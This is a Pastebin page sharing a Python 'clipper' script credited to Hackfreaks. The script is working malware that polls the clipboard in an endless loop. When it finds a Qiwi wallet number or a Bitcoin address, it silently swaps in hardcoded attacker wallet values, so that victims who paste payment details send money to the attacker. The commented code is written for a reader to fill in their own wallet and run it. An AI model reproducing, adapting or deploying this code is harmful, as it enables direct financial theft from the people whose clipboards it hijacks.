Guest User

python clipper shared by Hackfreaks

a guest
Nov 30th, 2021
606
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.91 KB | None | 0 0
  1. #########################################
  2. #                   #
  3. #   Channel: @hackingtipp (HACKFREAKS OFFICIAL) #
  4. #                   #
  5. #   BY : HACKFREAKS                             #
  6. #                   #
  7. #########################################
  8.  
  9.  
  10. import pyperclip        # Import a library for working with the clipboard
  11. from time import sleep      # Import of a library to stop the program for a while
  12.  
  13. country_code1 = '7'                 # 1st Country Code Option
  14. country_code2 = '8'                 # 2nd Country Code Option
  15. qiwi_rus_with_plus = '+73125424323'          # Your Qiwi with a plus
  16. qiwi_rus_without_plus = '83125424323'           # Your Qiwi without plus
  17. btc = '17weRxSXdU37uwhC5q4kShq3cnMkxYft6a'           # Your BTC Address
  18. btc_len = [26, 27, 28, 29, 30, 31, 32, 33, 34, 35]  # don't touch
  19.  
  20.  
  21. # Endless cycle
  22. while True:
  23.     clipboard = pyperclip.paste() # Get the contents of the clipboard
  24.     # If content length = wallet length without plus and content is not equal to wallet without plus, then ...
  25.     if len(clipboard) == len(qiwi_rus_without_plus) and clipboard != qiwi_rus_without_plus:
  26.         # If country codes are in content, then ...
  27.         if country_code1 in clipboard or country_code2 in clipboard:
  28.             pyperclip.copy(qiwi_rus_without_plus) # We put our own kiwi in the buffer without a plus
  29.     # If content length = plus wallet length and content is not equal to plus wallet, then ...
  30.     elif len(clipboard) == len(qiwi_rus_with_plus) and clipboard != qiwi_rus_with_plus:
  31.         # If + is in the contents of the buffer, then ...
  32.         if '+' in clipboard:
  33.             pyperclip.copy(qiwi_rus_with_plus) # We put our kiwi with a plus in the buffer to the user
  34.     # If the wallet length is from 26 to 35 and the first character is 1 or 3, then ...
  35.     elif len(clipboard) in btc_len and (clipboard[0] == '1' or clipboard[0] == '3'):
  36.         # If the content is not equal to our BTC-Address, then ...
  37.         if clipboard != btc:
  38.             pyperclip.copy(btc) # Put your bitcoin address in the buffer for the user
  39.  
  40.     sleep(1)  # Pause for 1 second
Advertisement
Add Comment
Please, Sign In to add comment